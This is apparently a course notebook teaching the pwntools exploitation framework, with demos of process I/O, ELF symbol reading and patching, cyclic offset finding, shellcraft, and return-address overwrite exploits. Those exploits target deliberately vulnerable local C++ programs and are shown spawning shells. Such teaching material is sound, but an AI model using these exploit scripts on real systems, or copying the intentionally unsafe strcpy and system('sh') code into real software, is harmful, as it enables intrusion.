# Pwntools Python Framework

- Complete Tutoraials found here: [https://github.com/Gallopsled/pwntools-tutorial](https://github.com/Gallopsled/pwntools-tutorial)
- Documentation on Pwntools found here: [https://docs.pwntools.com/en/stable/about.html](https://docs.pwntools.com/en/stable/about.html)


- this notebook provides quick tutorials and demos on most common tasks used in basic binary exploitations

## Pwntools Introduction

- a grab-bag of tools to make exploitation during CTFs as painless as possible, and to make exploits as easy to read as possible
- makes it easy to do a local exploit, remote exploit or exploit over SSH with a one-line change
- has two main main modules: `pwn` and `pwnlib`

### pwn - Toolbox optimized for CTFs

- `import pwn` or ` from pwn import *` - you'll have access to everythin you need to write an exploit
- we'll see pwntools usage and demos specific to CTFs in [CTF](./CTF.ipynb) notebook
- install pwntools with python package manager `pip`

### Caveat
- pwntools is generated for exploiting binary programing written in C and NOT CPP
- for binary written in C++, one has to work a little harder and know underlying basics of pwntools and binary generated by C++ compiler such as g++

### Installation
- install the release version on Linux using the following instructions

In [ ]:
%%bash
python3 -m pip install --upgrade pip
python3 -m pip install --upgrade pwntools

#### help

```bash
┌──(kali㉿K)-[~/EthicalHacking]
└─$ pwn -h                                                                                  2 ⨯
usage: pwn [-h]
           {asm,checksec,constgrep,cyclic,debug,disasm,disablenx,elfdiff,elfpatch,errno,hex,phd,pwnstrip,scramble,shellcraft,template,unhex,update,version}
           ...

Pwntools Command-line Interface

positional arguments:
  {asm,checksec,constgrep,cyclic,debug,disasm,disablenx,elfdiff,elfpatch,errno,hex,phd,pwnstrip,scramble,shellcraft,template,unhex,update,version}
    asm                 Assemble shellcode into bytes
    checksec            Check binary security settings
    constgrep           Looking up constants from header files. Example: constgrep -c freebsd
                        -m ^PROT_ '3 + 4'
    cyclic              Cyclic pattern creator/finder
    debug               Debug a binary in GDB
    disasm              Disassemble bytes into text format
    disablenx           Disable NX for an ELF binary
    elfdiff             Compare two ELF files
    elfpatch            Patch an ELF file
    errno               Prints out error messages
    hex                 Hex-encodes data provided on the command line or stdin
    phd                 Pwnlib HexDump
    pwnstrip            Strip binaries for CTF usage
    scramble            Shellcode encoder
    shellcraft          Microwave shellcode -- Easy, fast and delicious
    template            Generate an exploit template
    unhex               Decodes hex-encoded data provided on the command line or via stdin.
    update              Check for pwntools updates
    version             Pwntools version

optional arguments:
  -h, --help            show this help message and exit
```

In [ ]:
! pwn update

In [63]:
!pwd

/home/kali/Sp25/SoftwareSecurity/notebooks


In [64]:
%cd ../demos

/home/kali/Sp25/SoftwareSecurity/demos


In [65]:
! ls

aslr	       ctf	      injection			     setuid
assert	       envexploit     mem_leak			     simple_server
boost	       envvars	      memory_segments.cpp	     SQL
capleak        fmt_strings    other_overflow		     stack_overflow
compile_c.sh   gdb	      peda-session-vuln_cpp.exe.txt  system.cpp
compile.sh     heap_overflow  peda-session-vuln.exe.txt      tinyweb
countdown.cpp  hello.c	      pentest			     unittest1
c_string       hello.cpp      pwntools			     unittest2


In [ ]:
! pwn elfdiff ./hello.exe ./hello.exe

In [ ]:
! g++ -o hello.exe hello.cpp

In [ ]:
! gcc -o hello_c.exe hello.c

In [ ]:
! pwn elfdiff ./hello.exe ./hello_c.exe

In [ ]:
! pwn phd ./hello.exe

###  Using Pwntools with Python Scripts

```python
from pwn import *
```

- import all the names in global scope

- see all the names imported into global namespace to make your life easier: 
[https://docs.pwntools.com/en/stable/globals.html](https://docs.pwntools.com/en/stable/globals.html)

## Tubes
- need to talk to the target binary in order to `pwn` it!
- pwntools makes it a breeze...
- unlike other Python libraries, pwn doesn't seem to work directly on Jupyter Notebook that uses IPython
- let's use Python prompt on termial to demostrate some quick one liners for basic io
- see details: https://github.com/Gallopsled/pwntools-tutorial/blob/master/tubes.md
    

```bash

┌──(kali㉿K)-[~/EthicalHacking]
└─$ python                                                                                127 ⨯
Python 3.8.5 (default, Sep  4 2020, 07:30:14) 
[GCC 7.3.0] :: Anaconda, Inc. on linux
Type "help", "copyright", "credits" or "license" for more information.
>>> from pwn import *
>>> sh = process('sh')
[x] Starting local process '/usr/bin/sh'
[+] Starting local process '/usr/bin/sh': pid 16126

```

In [ ]:
from pwn import *

In [ ]:
sh = process('sh')

####  Basic IO
- `recv(n)` - Recieves any number of available bytes
- `recvline()` - Receives data until a newline is encountered
- `recvuntil(delim)` - Receives data until a delimeter is encountered
- `send(data)` - Sends data
- `sendline(data)` - Sends data plus a newline char
- `clean()` - Discard all buffered data

```bash
>>> sh.sendline(b'sleep 3; echo Hello World!;')
>>> print(sh.recvline())
b'Hello World!\n'
```

In [ ]:
sh.sendline(b'sleep 3; echo hello world')

In [ ]:
sh.recvline()

In [ ]:
sh.sendline(b'echo $((2+10))')

In [ ]:
print(sh.recvline().decode('utf-8'))

#### Interactive sessions
- let's pretend you land a shell on some remote server
- interactive mode doesn't work on Jupyter Notebook
- see script examples in `demos/pwntools/basic_io` folder

```bash
>>> sh.interactive()
[*] Switching to interactive mode

whoami  
kali
date
Fri 18 Dec 2020 12:28:44 PM MST

exit
[*] Got EOF while reading in interactive

[*] Process '/bin/sh' stopped with exit code 0 (pid 16145)
[*] Got EOF while sending in interactive
```

- compile `demos/pwntools/basic_io/io_demo.cpp` file
- manually run the file first then run the following pwn_io_demo.py script to automatically interact with the binary

In [ ]:
! pwd

In [66]:
! cat pwntools/basic_io/io_demo.cpp

#include <iostream>
#include <string>

using namespace std;

int main() {
    string name, address;
    int age;
    cout << "Enter your name:\n";
    getline(cin, name);
    cout << "Enter your age:\n";
    cin >> age;
    cout << "Enter your address:\n";
    cin >> ws;
    getline(cin, address);
    cout << "Hello, " << name << "! "
     << "Your're " << age << " old. "
     << "Your address is " << address << endl;
    cout << "Good bye!\n";
    return 0;
}

In [68]:
! ls

aslr	       ctf	      injection			     setuid
assert	       envexploit     mem_leak			     simple_server
boost	       envvars	      memory_segments.cpp	     SQL
capleak        fmt_strings    other_overflow		     stack_overflow
compile_c.sh   gdb	      peda-session-vuln_cpp.exe.txt  system.cpp
compile.sh     heap_overflow  peda-session-vuln.exe.txt      tinyweb
countdown.cpp  hello.c	      pentest			     unittest1
c_string       hello.cpp      pwntools			     unittest2


In [73]:
%%bash
input="pwntools/basic_io/io_demo.cpp"
output="io_demo.exe"
echo kali | sudo -S ./compile.sh $input $output

[sudo] password for kali: 

In [74]:
! cat pwntools/basic_io/pwn_io_demo.py

#!/usr/bin/env python

import pwn

# run process to interact with
io = pwn.process('./io_demo.exe')

# programmatically receive and use data

prompt = io.recvline(False)
print(f'prompt:  {prompt}')
# receives bytes array
if prompt.endswith(b'name:'):
    io.sendline(b"John Smith")

prompt = io.recvuntil(b"age:")
print(f"prompt = {prompt}")
# can only send bytes and string
io.sendline(b'21')

prompt = io.recvuntil(b"address:")
print(f"prompt = {prompt}")

io.sendline(b"111 North Street GJ CO 1111!")
print(f'{io.recv()}') # receive and discard \n
print(f'{io.recvline()}') # includes \n
print(io.recvline().decode('utf-8'), end='')

#io.interactive()


In [75]:
! python pwntools/basic_io/pwn_io_demo.py

[x] Starting local process './io_demo.exe'
[.] 
Starting local process './io_demo.exe': pid 269482
[+] 
prompt:  b'Enter your name:'
prompt = b'Enter your age:'
prompt = b'\nEnter your address:'
b'\n'
b"Hello, John Smith! Your're 21 old. Your address is 111 North Street GJ CO 1111!\n"
Good bye!
[*] Process './io_demo.exe' stopped with exit code 0 (pid 269482)


## Utility Functions
- half of Pwntools is utility functions so that you no longer need to copy paste things
- see here - https://github.com/Gallopsled/pwntools-tutorial/blob/master/utility.md

### Packing and Unpacking Integers

- integers such as memory addresses need to be sent to the target program according to it's endianness (x86 is little endian)
- pwntools can detect and automatically pack and unpack integers according to the endianness of the target program

- `pack()` - create word-size (4 bytes) packed (endian-aware) integer
    - help(pack)
- `unpack()` - unpacks a word-size integer (endian-aware)
    - help(unpack)
- `p32()` - pack an integer as 32-bit binary value
    - help(p32)
- `u32()` - unpack packed binary into integer value
    - help(u32)
- also has API to pack and unpack into 8, 16, 64-bit, and archetecture specific integer representations

In [ ]:
help(pack)

In [ ]:
pack(1)

In [ ]:
help(unpack)

In [ ]:
unpack(b'\x01\x00\x00\x00')

In [ ]:
p32(1)

In [ ]:
p32(2**32-1)

In [ ]:
p32(1, endian='big')

In [ ]:
p16(1)

In [ ]:
p64(1)

In [ ]:
p32(0xdeadbeef, endian='big')

In [ ]:
ret_add = add = p32(0xdeadbeef) # little endian

In [ ]:
ret_add

In [ ]:
print(u32(ret_add))

In [ ]:
hex(u32(ret_add))

## ELFs
- https://github.com/Gallopsled/pwntools-tutorial/blob/master/elf.md
- `ELF` class makes it easy to interact with ELF files

```bash
>>> from pwn import *
>>> ELF('/bin/bash')
[*] '/bin/bash'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      PIE enabled
    FORTIFY:  Enabled
ELF('/bin/bash')

```

### Using Symbols

- ELF files have several sets of symbols available
- symbols are contained in respective dictionary `{name: data}`
    - ELF.symbols - lists all known symbols, including those below. Preference is given the PLT entries over GOT entries.
    - ELF.got - only contains GOT entries
        - Global Offsets Table is used to resolve addresses of global variables and functions
    - ELF.plt only contains PLT entries
        - Procedure Linkage Table is used to call external/library procedures/functions whose address isn't known in the time of linking, and is left to be resolved by the dynamic linker at run time
        - once the address of functions are resolved they're cached in GOT for faster lookup
    - ELF.functions - only contains functions (requires DWARF symbols)
- more on PLT and GOT read [this](https://www.technovelty.org/linux/plt-and-got-the-key-to-code-sharing-and-dynamic-libraries.html)
- Let's compile and and read ELF of `demos/pwntools/demo.cpp` program

In [76]:
! cat pwntools/demo.cpp

#include <string.h>
#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <iostream>
using namespace std;

void get_shell() {
    system("sh");
}

void bad() {
    char buffer[64];
    printf("Enter some text: ");
    cin >> buffer;
    printf("You entered: %s\n", buffer);
}

int main(int argc, char** argv) {
    printf("Welcome... Enter to continue.\n");
    cin.get();
    system("clear");
    bad();
    printf("Good bye!\n");
    return 0;
}


In [82]:
%%bash
input="pwntools/demo.cpp"
output="demo.exe"
echo kali | sudo -S ./compile.sh $input $output

[sudo] password for kali: pwntools/demo.cpp: In function ‘int main(int, char**)’:
pwntools/demo.cpp:19:14: warning: unused parameter ‘argc’ [-Wunused-parameter]
   19 | int main(int argc, char** argv) {
      |          ~~~~^~~~
pwntools/demo.cpp:19:27: warning: unused parameter ‘argv’ [-Wunused-parameter]
   19 | int main(int argc, char** argv) {
      |                    ~~~~~~~^~~~


In [83]:
! nm demo.exe

080481cc r __abi_tag
0804c020 B __bss_start
0804c020 b completed.0
0804c018 D __data_start
0804c018 W data_start
080490f0 t deregister_tm_clones
080490d0 T _dl_relocate_static_pie
08049170 t __do_global_dtors_aux
0804bef8 d __do_global_dtors_aux_fini_array_entry
0804c01c D __dso_handle
0804befc d _DYNAMIC
0804c020 D _edata
0804c024 B _end
080492d8 T _fini
0804a000 R _fp_hw
080491a0 t frame_dummy
0804bef4 d __frame_dummy_init_array_entry
0804a1dc r __FRAME_END__
0804bff4 d _GLOBAL_OFFSET_TABLE_
         w __gmon_start__
0804a060 r __GNU_EH_FRAME_HDR
08049000 T _init
0804a004 R _IO_stdin_used
         U __libc_start_main@GLIBC_2.34
08049227 T main
         U printf@GLIBC_2.0
         U puts@GLIBC_2.0
08049130 t register_tm_clones
08049090 T _start
         U system@GLIBC_2.0
0804c020 D __TMC_END__
080490bd t __wrap_main
080492d3 T __x86.get_pc_thunk.ax
080490e0 T __x86.get_pc_thunk.bx
080491d1 T _Z3badv
080491a6 T _Z9get_shellv
         U _ZNSi3getEv@GLIBCXX_3.4
0804a05c r _ZNSt8__detail

In [84]:
# let's find the address of get_shell using nm program
! nm demo.exe | grep get_shell

080491a6 T _Z9get_shellv


In [81]:
from pwn import *

In [85]:
# let's load the binary contents using ELF class
e = ELF('./demo.exe')

[*] '/home/kali/Sp25/SoftwareSecurity/demos/demo.exe'
    Arch:       i386-32-little
    RELRO:      Partial RELRO
    Stack:      No canary found
    NX:         NX unknown - GNU_STACK missing
    PIE:        No PIE (0x8048000)
    Stack:      Executable
    RWX:        Has RWX segments
    Stripped:   No
    Debuginfo:  Yes


In [86]:
# let's see all the symbols; a python dictionary
e.symbols

{'_ZStrsIcSt11char_traitsIcEERSt13basic_istreamIT_T0_ES6_PS3_': 134517405,
 '_IO_stdin_used': 134520836,
 '__abi_tag': 134513100,
 '__wrap_main': 134516925,
 'deregister_tm_clones': 134516976,
 'register_tm_clones': 134517040,
 '__do_global_dtors_aux': 134517104,
 'completed.0': 134529056,
 '__do_global_dtors_aux_fini_array_entry': 134528760,
 'frame_dummy': 134517152,
 '__frame_dummy_init_array_entry': 134528756,
 '_ZNSt8__detail30__integer_to_chars_is_unsignedIjEE': 134520924,
 '_ZNSt8__detail30__integer_to_chars_is_unsignedImEE': 134520925,
 '_ZNSt8__detail30__integer_to_chars_is_unsignedIyEE': 134520926,
 '__FRAME_END__': 134521308,
 '__GNU_EH_FRAME_HDR': 134520928,
 '_DYNAMIC': 134528764,
 '_GLOBAL_OFFSET_TABLE_': 134529012,
 '__x86.get_pc_thunk.ax': 134517459,
 '_edata': 134529056,
 '_Z9get_shellv': 134517158,
 'data_start': 134529048,
 '_fp_hw': 134520832,
 'main': 134517287,
 '_Z3badv': 134517201,
 '__dso_handle': 134529052,
 '_fini': 134517464,
 '_dl_relocate_static_pie': 1345

In [87]:
e.functions

{'_ZStrsIcSt11char_traitsIcEERSt13basic_istreamIT_T0_ES6_PS3_': Function(name='_ZStrsIcSt11char_traitsIcEERSt13basic_istreamIT_T0_ES6_PS3_', address=0x804929d, size=0x36, elf=ELF('/home/kali/Sp25/SoftwareSecurity/demos/demo.exe')),
 '_Z9get_shellv': Function(name='_Z9get_shellv', address=0x80491a6, size=0x2b, elf=ELF('/home/kali/Sp25/SoftwareSecurity/demos/demo.exe')),
 'main': Function(name='main', address=0x8049227, size=0x76, elf=ELF('/home/kali/Sp25/SoftwareSecurity/demos/demo.exe')),
 '_Z3badv': Function(name='_Z3badv', address=0x80491d1, size=0x56, elf=ELF('/home/kali/Sp25/SoftwareSecurity/demos/demo.exe')),
 '_dl_relocate_static_pie': Function(name='_dl_relocate_static_pie', address=0x80490d0, size=0x1, elf=ELF('/home/kali/Sp25/SoftwareSecurity/demos/demo.exe')),
 '__x86.get_pc_thunk.bx': Function(name='__x86.get_pc_thunk.bx', address=0x80490e0, size=0x4, elf=ELF('/home/kali/Sp25/SoftwareSecurity/demos/demo.exe')),
 '_start': Function(name='_start', address=0x8049090, size=0x32,

In [88]:
# look at individual entry in symbols table
print(f'{e.symbols["main"]:#010x}')

0x08049227


In [89]:
# look at individual entry in got table
print(f'{e.got["printf"]:#010x}')

0x0804c008


In [90]:
# look at individual entry in plt table
print(f'{e.plt["printf"]:#010x}')

0x08049050


In [91]:
# look at individual entry in functions and it's address vale
print(f'{e.functions["main"].address:#010x}')

0x08049227


In [92]:
# use get method instead of [] operator to avoid exception
get_shell = e.symbols.get('_Z9get_shellv')

In [93]:
print(hex(get_shell))

0x80491a6


In [94]:
print(f'{get_shell:#010x}')

0x080491a6


In [95]:
# programmatically find the address of get_shell function
# similar to nm | grep get_shell command
for key in e.functions:
    if 'get_shell' in key:
        print(f'{key} {e.functions[key].address:#010x}')

_Z9get_shellv 0x080491a6


### Reading ELF Files
- interact with ELF as if it were loadded into memory
- use `read`, `write`, `pack`, `unpack`, `disasm`, etc. methods to interact

In [23]:
get_shell = e.symbols.get('_Z9get_shellv')

In [24]:
print(f'{get_shell:#010x}')

0x08049256


In [25]:
# read 14 bytes from starting of get_shell() location
e.read(get_shell, 14)

b'\xf3\x0f\x1e\xfbU\x89\xe5S\x83\xec\x04\xe8x\x01'

In [27]:
e.address

134512640

In [26]:
# print 4 bytes from the beginning of the e's address in memory
print(e.read(e.address, 4))

b'\x7fELF'


In [28]:
# disassemble the 14 bytes from the starting of get_shell() location
print(e.disasm(get_shell, 14))

 8049256:       f3 0f 1e fb             endbr32 
 804925a:       55                      push   ebp
 804925b:       89 e5                   mov    ebp, esp
 804925d:       53                      push   ebx
 804925e:       83 ec 04                sub    esp, 0x4
 8049261:       e8                      .byte 0xe8
 8049262:       78 01                   js     0x8049265


### Patching ELF Files
- modify/patch ELF files
- let's modify `clear` with `sh` to get a shell

In [29]:
e = ELF('./demo.exe')

In [30]:
# returns an iterator
e.search(b'clear')

<generator object ELF.search at 0x7fffd69ebcd0>

In [31]:
# convert the first address of the string 'clear' in the binary into hex
hex(next(e.search(b'clear')))

'0x804a04c'

In [32]:
# read the 5 characters from the address of the string 'clear'
e.read(0x804a04c, 5)

b'clear'

In [33]:
# patch the binary by replacing the string 'clear' with 'sh\x00'
e.write(next(e.search(b'clear')), b'sh\x00')

In [35]:
# save the patched binary
e.save('pwntools-demos/demo_mod.exe')

In [ ]:
! ls -al ./demo_mod.exe

In [ ]:
! chmod +x ./demo_mod.exe

In [ ]:
! ls -al ./demo_mod.exe
# run the demo_mod.exe from a terminal

### Generating Unique Cyclic Sequences
- inorder to find offset, we need to generate a cyclic pattern long enough to crash the target program by over-writing the caller's return address

- `cyclic(length, n)` - Generates a length of the sequence that should be `n` character unique
- `cyclic_find(subsequence, n)` - Finds subsequence that's `n` bytes unique; return positive index for -1 (if subsequence not found)

- create a cyclic pattern of size 20 with group of 8 unique characters

```bash
>>> cyclic(20, n=8)
b'aaaaaaaabaaaaaaacaaa'
```

- search 8 a's subsequence in cyclic pattern

```bash
>>> cyclic_find('aaaaaaaa', n=8)
0

```

### Core dump and offset

- see `demos/pwntools-demos/core_files` to find offset from core dump files

In [36]:
# generate a cyclic pattern of 10 characters with default length of 4
cyclic(10)

b'aaaabaaaca'

In [37]:
# generate a cyclic pattern of 10 characters with length of 8
c = cyclic(20, n=8)

In [38]:
c

b'aaaaaaaabaaaaaaacaaa'

In [40]:
cyclic_find(c, n=8)

[!] cyclic_find() expected a 8-byte subsequence, you gave b'aaaaaaaabaaaaaaacaaa'
    Unless you specified cyclic(..., n=20), you probably just want the first 8 bytes.
    Truncating the data at 8 bytes.  Specify cyclic_find(..., n=20) to override this.


0

In [41]:
# typically used in x64-bit system
cyclic_find('aaaaaaaa', n=8)

0

In [42]:
# typically used in x32-bit system
cyclic_find('aaaa')

0

In [43]:
cyclic_find('baaaaaaa', n=8)

8

In [45]:
cyclic_find('baaa', n=4)

4

### Shellcode

- pwntools provide shellcraft command to generate shellcode for different platforms for many common purposes
- list available shellcode

```bash
$ shellcraft --help
$ shellcraft -l
$ shellcraft -l | grep i386.linux

```

- running a shellcode

```bash
┌──(kali㉿K)-[~]
└─$ shellcraft -r i386.linux.sh    
[!] Your binutils version is too old and may not work!
    Try updating with: https://docs.pwntools.com/en/stable/install/binutils.html
    Reported Version: "GNU assembler (crosstool-NG 1.23.0.444-4ea7) 2.31.1\nCopyright (C) 2018 Free Software Foundation, Inc.\nThis program is free software; you may redistribute it under the terms of\nthe GNU General Public License version 3 or later.\nThis program has absolutely no warranty.\nThis assembler was configured for a target of `x86_64-conda_cos6-linux-gnu'."
[*] '/tmp/pwn-asm-f0hjebqe/step3-elf'
    Arch:     i386-32-little
    RELRO:    No RELRO
    Stack:    No canary found
    NX:       NX disabled
    PIE:      No PIE (0x8049000)
    RWX:      Has RWX segments
[+] Starting local process '/tmp/pwn-asm-f0hjebqe/step3-elf': pid 22485
[*] Switching to interactive mode
$ whoami
kali
$ 
```

### Shellcraft in Script

- **shellcraft** API can be used in script to generate shellcode
- **asm** function can be used to assemble the shellcraft
- **make_elf** function can be used to generate standalong ELF from assemble shellcode
- elf format could be written into a binary file and execute like a regular program
- run `demos/pwntools-demos/shellcraft/shellcraft.py` file for demo

## Exploit Code Development

- we'll use `demos/pwntools/basic_exploit/vuln.cpp` file to demonstrate the basic exploit generation with Python and pwn library

In [96]:
!pwd

/home/kali/Sp25/SoftwareSecurity/demos


In [97]:
! cat pwntools/basic_exploit/vuln.cpp

#include <string.h>
#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>

void get_shell() {
    system("sh");
}

void bad(char * data) {
    char buffer[64];
    strcpy(buffer, data);
    printf("%s\n", buffer);
    printf("Buffer is at %p\n", buffer);
}

int main(int argc, char** argv) {
    bad(argv[1]);
}


- goal is to get the program execute `get_shell()` by overflowing the caller's return address in `bad()`
- let's see an example that uses gdb-peda and pwntools first, then we'll see an example using only pwntools

In [98]:
%%bash
input="pwntools/basic_exploit/vuln.cpp"
output="pwntools/basic_exploit/vuln_cpp.exe"
echo kali | sudo -S ./compile.sh $input $output

[sudo] password for kali: pwntools/basic_exploit/vuln.cpp: In function ‘int main(int, char**)’:
pwntools/basic_exploit/vuln.cpp:17:14: warning: unused parameter ‘argc’ [-Wunused-parameter]
   17 | int main(int argc, char** argv) {
      |          ~~~~^~~~


In [35]:
# run the target program passing "Hello World!" argument
! ./pwntools-demos/basic_exploit/vuln_cpp.exe "Hello World!"

Hello World!
Buffer is at 0xffffbc90


In [36]:
# find offset using gdb-peda
! gdb -q --batch --command=./pwntools-demos/basic_exploit/find_offset.batch --args \
./pwntools-demos/basic_exploit/vuln_cpp.exe

Set 1 arguments to program
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".
AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA
Buffer is at 0xffffbb70

Program received signal SIGSEGV, Segmentation fault.
Use 'set logging enabled off'.

Use 'set logging enabled on'.

[----------------------------------registers-----------------------------------]
EAX: 0x18 
EBX: 0x41413341 ('A3AA')
ECX: 0x0 
EDX: 0x0 
ESI: 0xffffbcb0 --> 0xffffc090 ("COLORFGBG=15;0")
EDI: 0xf7ffcb60 --> 0x0 
EBP: 0x65414149 ('IAAe')
ESP: 0xffffbbc0 ("AJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA")
EIP: 0x41344141 ('AA4A')
EFLAGS: 0x10282 (carry parity adjust zero SIGN trap INTERRUPT direction overflow)
[------------------------

In [100]:
! gdb -q --batch --command=./pwntools/basic_exploit/find_offset.batch --args \
./pwntools/basic_exploit/vuln_cpp.exe | grep EIP+0

EIP+0 found at offset: 76


In [32]:
! nm pwntools-demos/basic_exploit/vuln_cpp.exe | grep get_shell

08049186 T _Z9get_shellv


In [101]:
# let's see the exploit code
! cat pwntools/basic_exploit/exploit_vuln.py

#! /usr/bin/env python

from pwn import *

target_name = './vuln_cpp.exe'

offset = 76  # FIXME
# find address of get_shell function
get_shell = p32(0x08049176)  # b"\x82\x91\x04\x08" # FIXME
payload = b'A'*offset+get_shell
print(f'{payload} has length {len(payload)}')

# run target program with the payload as an argument
io = process([target_name, payload])

# Get a shell!
io.sendline(b'id')
print(io.recvline())

# get interactive shell
io.interactive()


- run the exploit
- get the shell!

```bash
┌──(kali㉿K)-[~/EthicalHacking/pwntools-demos/basic_exploit]
└─$ python exploit_vuln.py 
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\x82\x91\x04\x08' has length 80
[+] Starting local process './vuln_cpp.exe': pid 17369
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\x82\x91\x04\x08\n'
[*] Switching to interactive mode
uid=1000(kali) gid=1000(kali) groups=1000(kali),24(cdrom),25(floppy),27(sudo),29(audio),30(dip),44(video),46(plugdev),109(netdev),118(bluetooth),133(scanner),141(kaboxer)
$ 
$ whoami
kali
$ date
Fri 18 Dec 2020 01:52:03 PM MST
$ exit
[*] Got EOF while reading in interactive
$ 
[*] Process './vuln_cpp.exe' stopped with exit code -11 (SIGSEGV) (pid 17369)
[*] Got EOF while sending in interactive
```

### Automate Everything with pwn API

- no gdb, and peda required for generating simple exploits
- we can use core dump to automatically find the offset and the controlled return address using **pwn** library
- check and set the coredump settings
- work directly on a Terminal if jupyter notebook doesn't work
- NOTE: if the vulnerable target program is `setuid` you must run the exploit code with sudo so the core dump can be accessed by the script for processing

In [ ]:
# check if the kernel can store coredump of a program crash
# if it's 0, set it to unlimited
! ulimit -c

In [ ]:
! ulimit -c unlimited

In [ ]:
# jupyter notebook still says 0; check it on the terminal
! ulimit -c

In [ ]:
# check the coredump location and pattern
! cat /proc/sys/kernel/core_pattern

In [ ]:
# if it' not core, set it to store the coredump as core in the working directory
! echo kali | sudo -S sysctl -w kernel.core_pattern=core

In [ ]:
# check the coredump location and pattern again and make sure its core
! cat /proc/sys/kernel/core_pattern

In [ ]:
# -a option gives you all the settings
! ulimit -a

In [ ]:
# double check to make sure file name prefix of core_pattern is core
! cat /proc/sys/kernel/core_pattern

In [102]:
! cat pwntools/basic_exploit/exploit_vuln_cpp.py

#! /usr/bin/env python

# https://docs.pwntools.com/en/stable/elf/corefile.html

from pwn import *

target_name = './vuln_cpp.exe'
# Set up pwntools for the correct architecture
exe = context.binary = ELF(target_name)

# print(exe.symbols)

# Generate a cyclic pattern so that we can auto-find the offset
payload = cyclic(128)

# Run the process once so that it crashes
p = process([target_name, payload])
p.wait()  # wait for close

# Get the core dump of the crashed process
core = p.corefile

# read the core dump file directly
# core = Core('coredump_file')

# Our cyclic pattern should have been used as the crashing address, make sure!
# assert p32(core.eip) in payload
crash_ip = core.eip
offset = cyclic_find(crash_ip)
# offset = cyclic_find(core.read(core.esp, 4))-4
print(f'{offset=}')
# search for get_shell function address
# in C; func_address = exe.symbols.get_shell
# in C++; parse the symbols dictionary to look for function name in key
for symbol in exe.symbols.keys():
    if symbol

- for the above exploit code, everything needed to exploit the prgram is automatically determined using pwntools API except for the target program name

- run the exploit and enjoy the shell

```bash
                                                                                           
@rambasnet ➜ /workspaces/…/demos/pwntools/basic_exploit (main) $ python exploit_vuln_cpp.py 
[*] '/workspaces/SoftwareSecurity/demos/pwntools-demos/basic_exploit/vuln_cpp.exe'
    Arch:       i386-32-little
    RELRO:      Partial RELRO
    Stack:      No canary found
    NX:         NX unknown - GNU_STACK missing
    PIE:        No PIE (0x8048000)
    Stack:      Executable
    RWX:        Has RWX segments
    SHSTK:      Enabled
    IBT:        Enabled
    Stripped:   No
    Debuginfo:  Yes
[+] Starting local process './vuln_cpp.exe': pid 24733
[*] Process './vuln_cpp.exe' stopped with exit code -11 (SIGSEGV) (pid 24733)
[+] Parsing corefile...: Done
[*] '/workspaces/SoftwareSecurity/demos/pwntools-demos/basic_exploit/core.24733'
    Arch:      i386-32-little
    EIP:       0x61616161
    ESP:       0xffffb0b0
    Exe:       '/workspaces/SoftwareSecurity/demos/pwntools/basic_exploit/vuln_cpp.exe' (0x8048000)
    Fault:     0x61616161
/usr/local/python/3.12.1/lib/python3.12/site-packages/pwnlib/context/__init__.py:1709: BytesWarning: Text is not bytes; assuming ASCII, no guarantees. See https://docs.pwntools.com/#bytes
  return function(*a, **kw)
[+] Starting local process './vuln_cpp.exe': pid 24736
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\xd6\x91\x04\x08\n'
b'uid=1000(codespace) gid=1000(codespace) groups=1000(codespace),106(ssh),107(docker),989(pipx),990(python),991(oryx),992(golang),993(sdkman),994(rvm),995(php),996(conda),997(nvs),998(nvm),999(hugo)\n'
[*] Switching to interactive mode
$ whoami
codespace
$ ls
compile.sh    exploit_vuln.py      find_offset.batch              vuln.c
compile_c.sh  exploit_vuln_c.py    peda-session-vuln_c.exe.txt    vuln.cpp
core.24733    exploit_vuln_cpp.py  peda-session-vuln_cpp.exe.txt  vuln_cpp.exe
$ date
Fri Mar  7 21:53:13 UTC 2025
$ exit
```

## Create Template Exploit code

- we can create an exploit code template using **pwn** and update it as necessary
- let's create the template for local exploit (default!)
- use shellcraft and/or hardcoded shellcode to exploit the vulnerable program

```bash
pwn template exe_binary_file > template_file.py
```

- run the default template as it is
- run with GDB argument

In [103]:
%%bash
# Compile vuln.cpp file in shellcraft folder
input="pwntools/shellcraft/vuln_arg.cpp"
output="pwntools/shellcraft/vuln_arg.exe"
echo kali | sudo -S ./compile.sh $input $output

[sudo] password for kali: pwntools/shellcraft/vuln_arg.cpp: In function ‘int main(int, char**)’:
pwntools/shellcraft/vuln_arg.cpp:17:14: warning: unused parameter ‘argc’ [-Wunused-parameter]
   17 | int main(int argc, char** argv) {
      |          ~~~~^~~~


In [105]:
! ./pwntools/shellcraft/vuln_arg.exe "hello there"

hello there
Buffer is at 0xffffbc80


In [106]:
%cd pwntools/shellcraft

/home/kali/Sp25/SoftwareSecurity/demos/pwntools/shellcraft


In [108]:
! pwn template vuln_arg.exe > template_exploit.py

[*] Automatically detecting challenge binaries...


In [109]:
! cat template_exploit.py

#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# This exploit template was generated via:
# $ pwn template vuln_arg.exe
from pwn import *

# Set up pwntools for the correct architecture
exe = context.binary = ELF(args.EXE or 'vuln_arg.exe')

# Many built-in settings can be controlled on the command-line and show up
# in "args".  For example, to dump all data sent/received, and disable ASLR
# for all created processes...
# ./exploit.py DEBUG NOASLR



def start(argv=[], *a, **kw):
    '''Start the exploit against the target.'''
    if args.GDB:
